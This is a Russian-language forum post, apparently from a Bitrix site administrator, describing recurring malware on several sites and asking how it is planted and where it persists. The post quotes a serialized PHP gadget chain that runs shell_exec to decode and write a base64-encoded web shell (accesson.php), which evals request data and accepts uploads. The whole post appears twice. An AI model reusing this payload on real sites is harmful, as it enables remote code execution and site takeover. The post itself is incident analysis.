Доброго времени суток.
Столкнулся со следующим: есть несколько сайтов на поддержке, с разной степенью свежести (в плане ядра), но на некоторых появились вирусы, причем одинаковые. Пытался разобраться, откуда и как могли попасть - формы вроде все закрыты, с проверками, нестандартных механизмов не используется.
Вот что нашел у всех:
В папке upload/tmp/ появились папки вида /BXTEMP-2023-03-12/21/bxu/main/2357e58a5cae834135f227fb82435761 (дата и гуид - разные), в которых находятся следующие файлы:[QUOTE]CID590.log
default
pIndex8190754681405.package[/QUOTE]
номера в названиях тоже отличаются, но файлы есть в каждой папке с гуидом.
По структуре - это сериализованые данные (php сериализация).
содержимое:
CID590.log:[QUOTE]a:1:{s:13:"executeStatus";s:8:"executed";}[/QUOTE]
pIndex8190754681405.package[QUOTE]a:6:{s:3:"CID";s:6:"CID590";s:6:"pIndex";s:19:"pIndex8190754681405";s:10:"filesCount";s:1:"1";s:5:"files";a:2:{s:1:"";s:5:"error";s:8:"default";s:5:"error";}s:13:"executeStatus";s:8:"executed";s:12:"uploadStatus";s:10:"inprogress";}[/QUOTE]
И самый интересный - pIndex8190754681405.package:[QUOTE]O:25:"Bitrix\Main\Entity\Result":2:{s:12:"*isSuccess";b:0;s:9:"*errors";O:36:"Bitrix\Main\UserConsent\DataProvider":1:{s:7:"*data";a:2:{i:0;O:26:"CAdminDraggableBlockEngine":2:{s:10:"*engines";a:1:{i:0;a:1:{s:5:"check";s:10:"shell_exec";}}s:7:"*args";s:523:"echo PD89NDA5NzIzKjIwO2lmKG1kNSgkX0NPT0tJRVtkXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbaWRdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4=|base64 -d| tee ../. ./accesson.php";}i:1;s:5:"check";}}}[/QUOTE]
В base64 - соответственно код, в котором происходит стандартный eval входящих данных.
Как я понимаю - это механизм какого-то планировщика, которому подсунули данный код.
Судя по тому, что вирус появляется постоянно (в смысле - нахожу и вычищаю подобные файлы антивирусами и вручную, а они снова появляются) - это либо где-то есть механизм, который дергают и снова создаются данные файлы, либо это прописалось в базу.
Соответственно вопрос - можно ли определить - что это за механизм и где просмотреть - не прописан ли в планировщик данный код?
Столкнулся со следующим: есть несколько сайтов на поддержке, с разной степенью свежести (в плане ядра), но на некоторых появились вирусы, причем одинаковые. Пытался разобраться, откуда и как могли попасть - формы вроде все закрыты, с проверками, нестандартных механизмов не используется.
Вот что нашел у всех:
В папке upload/tmp/ появились папки вида /BXTEMP-2023-03-12/21/bxu/main/2357e58a5cae834135f227fb82435761 (дата и гуид - разные), в которых находятся следующие файлы:[QUOTE]CID590.log
default
pIndex8190754681405.package[/QUOTE]
номера в названиях тоже отличаются, но файлы есть в каждой папке с гуидом.
По структуре - это сериализованые данные (php сериализация).
содержимое:
CID590.log:[QUOTE]a:1:{s:13:"executeStatus";s:8:"executed";}[/QUOTE]
pIndex8190754681405.package[QUOTE]a:6:{s:3:"CID";s:6:"CID590";s:6:"pIndex";s:19:"pIndex8190754681405";s:10:"filesCount";s:1:"1";s:5:"files";a:2:{s:1:"";s:5:"error";s:8:"default";s:5:"error";}s:13:"executeStatus";s:8:"executed";s:12:"uploadStatus";s:10:"inprogress";}[/QUOTE]
И самый интересный - pIndex8190754681405.package:[QUOTE]O:25:"Bitrix\Main\Entity\Result":2:{s:12:"*isSuccess";b:0;s:9:"*errors";O:36:"Bitrix\Main\UserConsent\DataProvider":1:{s:7:"*data";a:2:{i:0;O:26:"CAdminDraggableBlockEngine":2:{s:10:"*engines";a:1:{i:0;a:1:{s:5:"check";s:10:"shell_exec";}}s:7:"*args";s:523:"echo PD89NDA5NzIzKjIwO2lmKG1kNSgkX0NPT0tJRVtkXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbaWRdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4=|base64 -d| tee ../. ./accesson.php";}i:1;s:5:"check";}}}[/QUOTE]
В base64 - соответственно код, в котором происходит стандартный eval входящих данных.
Как я понимаю - это механизм какого-то планировщика, которому подсунули данный код.
Судя по тому, что вирус появляется постоянно (в смысле - нахожу и вычищаю подобные файлы антивирусами и вручную, а они снова появляются) - это либо где-то есть механизм, который дергают и снова создаются данные файлы, либо это прописалось в базу.
Соответственно вопрос - можно ли определить - что это за механизм и где просмотреть - не прописан ли в планировщик данный код?